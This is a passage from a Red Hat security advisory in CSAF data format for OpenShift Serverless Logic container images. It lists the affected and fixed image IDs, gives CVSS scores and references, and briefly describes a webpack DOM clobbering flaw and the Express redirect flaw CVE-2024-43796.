"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", 